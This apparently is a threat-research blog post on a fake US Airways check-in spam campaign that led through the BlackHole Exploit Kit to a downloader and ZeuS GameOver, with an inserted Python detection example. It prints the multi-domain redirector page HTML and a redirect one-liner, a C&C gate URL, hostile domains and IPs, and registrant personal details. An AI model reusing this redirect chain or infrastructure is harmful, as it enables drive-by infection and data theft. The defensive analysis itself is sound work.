Spam
On 20 March, we detected a spam campaign targeting passengers of US Airways. For almost the entire week the cybercriminals were sending users the following email, purportedly from US Airways:
The email gives a brief description of the check-in procedure and provides a confirmation code for the online reservation.
The criminals are obviously banking on recipients who really are flying on the flight mentioned in the email clicking the “Online reservation details” link.
Different emails contained different links — for example, we noticed the following domains: sulichat.hu, prakash.clanteam.com, panvelkarrealtors.com.
After clicking the link, a series of redirects eventually leads to a domain hosting the BlackHole Exploit Kit.
BlackHole Exploit Kit: redirections and infection
A typical BlackHole infection routine is used to infect users’ computers.
The first port of call after clicking the link in the email is a page with the following HTML code:
<html>
<h1 id="wait-please">WAIT PLEASE</h1>
<h3 id="loading">Loading…</h3>
<script type="text/javascript" src="http://boemelparty.be/<removed>/js.js"></script>
<script type="text/javascript" src="http://nhb.prosixsoftron.in/<removed>/js.js"></script>
<script type="text/javascript" src="http://sas.hg.pl/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.vinhthanh.com.vn/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.alpine-turkey.com/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.thedugoutdawgs.com/<removed>/js.js"></script>
</html>
As a result, JavaScript files are loaded into the user’s browser from several different domains. Each of them contains a single command such as document.location='http://indigocellular.com/', which redirects the user to a page containing another, obfuscated, JavaScript.
This JavaScript inserts links into the HTML of the page that lead to the object carrying the exploit. So far we have detected three types of object: a JAR file, an SWF file and a PDF document. Each exploits a vulnerability in the corresponding application (Java, Flash Player or Adobe Reader) to execute malicious code on the targeted system. If a vulnerable version of even one of these applications is in use, the attack ends in infection: the malicious executable is downloaded and run on the user’s system.
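The two first-stage observations above (a near-empty page that pulls scripts from several unrelated hosts, and scripts consisting of nothing but a location assignment) can be turned into simple detection heuristics. The following Python is an added example, not code from the original post or from the exploit kit; the HTML and script body are constructed samples with placeholder hostnames.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample mirroring the landing page quoted above: a stub body
# plus external <script src> tags. Hostnames are placeholders.
LANDING_HTML = """<html>
<h1 id="wait-please">WAIT PLEASE</h1>
<h3 id="loading">Loading...</h3>
<script type="text/javascript" src="http://a.example.test/x/js.js"></script>
<script type="text/javascript" src="http://b.example.test/x/js.js"></script>
<script type="text/javascript" src="http://c.example.test/x/js.js"></script>
<script type="text/javascript" src="http://d.example.test/x/js.js"></script>
</html>"""

# Constructed body of one loaded script: nothing but a location assignment.
SCRIPT_BODY = "document.location='http://redirect.example.test/';"

# Matches a script whose whole content is a single assignment to location.
REDIRECT_RE = re.compile(
    r"^\s*(?:window\.|top\.|self\.)?(?:document\.)?location(?:\.href)?"
    r"\s*=\s*['\"]([^'\"]+)['\"]\s*;?\s*$"
)

class ScriptSrcCollector(HTMLParser):
    # Collects absolute src URLs from <script> tags; relative ones are ignored.
    def __init__(self):
        super().__init__()
        self.srcs = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src and urlparse(src).netloc:
                self.srcs.append(src)

def external_script_hosts(html, page_host):
    """Distinct hosts, other than the page's own, that serve its scripts."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    return sorted({urlparse(s).netloc.lower() for s in parser.srcs} - {page_host.lower()})

def pure_redirect_target(js):
    """Return the target URL if the script is only a location assignment."""
    match = REDIRECT_RE.match(js)
    return match.group(1) if match else None

def looks_like_redirector_page(html, page_host, min_hosts=3):
    """First-stage heuristic: a near-empty page pulling scripts from
    several unrelated hosts, as in the landing page above."""
    return len(external_script_hosts(html, page_host)) >= min_hosts
```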
The malicious JAR, SWF and PDF documents are loaded from different domains, e.g. indigocellular.com, browncellular.com and bronzecellular.com (registration details are given at the end of this post), under the names Qai.jar, field.swf, dea86.pdf and 11591.pdf.
We detect these exploits as:
Exploit.Java.CVE-2011-3544.mz
Exploit.SWF.Agent.gd
Exploit.JS.Pdfka.fof
After the vulnerabilities are successfully exploited, an executable file is downloaded from the same domains that host the exploits. It arrives under various names (about.exe, contacts.exe and others) and is essentially a downloader. When run, it connects to its C&C at the URL “176.28.18.135/pony/gate.php”, then downloads and runs another malicious program on the user’s system: ZeuS/ZBot or, more precisely, a modification from one of that Trojan’s development branches known as ‘GameOver’.
ZeuS is downloaded from hacked sites such as:
cinecolor.com.ar
bizsizanayasaolmaz.org
cyrpainting.cl
hellenic-antiaging-academy.gr
elektro-pfeffer.at
grupozear.es
sjasset.com
Polymorphism
At every stage of this attack, each object (domains, links to JavaScript files, exploit files, the downloader and ZeuS) was frequently replaced with a new one. The domains stayed “alive” for around 12 hours, while the ZeuS samples were replaced more often.
During the short periods of time (a few hours over several days) that I was monitoring what files were being downloaded, I managed to detect 6 modifications of the downloader and 3 modifications of ZeuS.
To recap, a modification includes all the samples detected with the same verdict, hence the number of detected programs is usually bigger than the number of verdicts.
Downloader verdicts:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Trojan-PSW.Win32.Fareit.oo
Trojan-PSW.Win32.Fareit.pb
Trojan.Win32.Jorik.Downloader.ams
Total number of programs detected with these verdicts: 250.
ZeuS verdicts:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Total number of samples detected with these verdicts: 127.
As I have already mentioned, these were only the verdicts I managed to record. There were undoubtedly more modifications throughout the course of this particular spam campaign.
Botnet identifiers
It wasn’t just the ZeuS wrapper (packer, anti-emulation) that was being changed; the malicious program itself was being recompiled. ZeuS contains a hardcoded botnet ID string and a set of IP addresses that the malicious program tries to connect to following infection. These data were modified over time as well. Judging by the numbers of detected and analyzed samples, we can assume that ZeuS was being recompiled at every second repacking.
Having analyzed 48 versions of the different modifications of ZeuS used by the cybercriminals in this attack, I discovered 19 unique botnet identifiers:
chinz22, chinz24, blk25, mmz22, mmz24, mmz25, molotz25, NR22, NR23, NR24, NR25, ppcz22, ppcz23, ppcz24, rnato25, rubz22, rubz23, rubz24, zuu
In contrast to the conventional ZeuS program, which usually contains a single URL from which to download a configuration file, each GameOver sample has 20 hardcoded IP addresses with ports. Having infected the victim’s computer, GameOver tries to connect to those addresses in order to announce itself to the botnet, retrieve information (e.g. web injects) and send the data stolen from the victim.
Of the 960 IP addresses contained in the 48 analyzed samples, just 157 are unique.
Attack geography
I presume that during this time spam emails with links to confirm US Airways flight reservations were not the only method used to spread ZeuS. Cybercriminals are nothing if not original. And even though this is not the first time they’ve used a flight-related trick, it’s the first time this particular kind of spam has been detected. If the recipients belong to a target audience, they are much more likely to click on a malicious link in an email. However, the majority of users who received these emails were not flying anywhere that day, which is why very few fell for the scam.
Obviously, other spam emails sent during the period under review also contained links leading to the same sites, the same exploits and the same malicious executables mentioned above. I took a look at where our users encountered the threats that were related in one way or another to this attack. Below is a geographical breakdown of the detected exploits, downloaders and ZeuS modifications used by the cybercriminals in this attack:
Country | Share of detections
--- | ---
Russia | 32.8%
USA | 10.3%
Italy | 9.2%
Germany | 8.6%
India | 6.9%
France | 3.8%
Ukraine | 3.6%
Poland | 3.2%
Brazil | 3.1%
Malaysia | 3%
Spain | 2.9%
China | 2.7%
P.S. Here is some information about the domains used in the spam campaign described above (this is not the first time these registration details have been used to register domains involved in spreading malware via spam):
Domain | IP address | Registrant | Address | Tel.
--- | --- | --- | --- | ---
indigocellular.com | 209.59.218.102 | Nicholas Guzzardi, clarelam@primasia.com | 5536 Gold Rush Dr. NW, 87120 Albuquerque, United States | +1.5053505497
browncellular.com | 174.140.168.207 | Renee Fabian, clarelam@primasia.com | 2840 Center Port Circle, Pompano Beach, FL 33064, US | 
bronzecellular.com | 96.9.151.220 | Renee Fabian, clarelam@primasia.com | 2840 Center Port Circle, Pompano Beach, FL 33064, US | 
Below is an excerpt of the MD5 hashes of the files involved (exploits, downloaders and ZeuS samples).
A gift from ZeuS for passengers of US Airways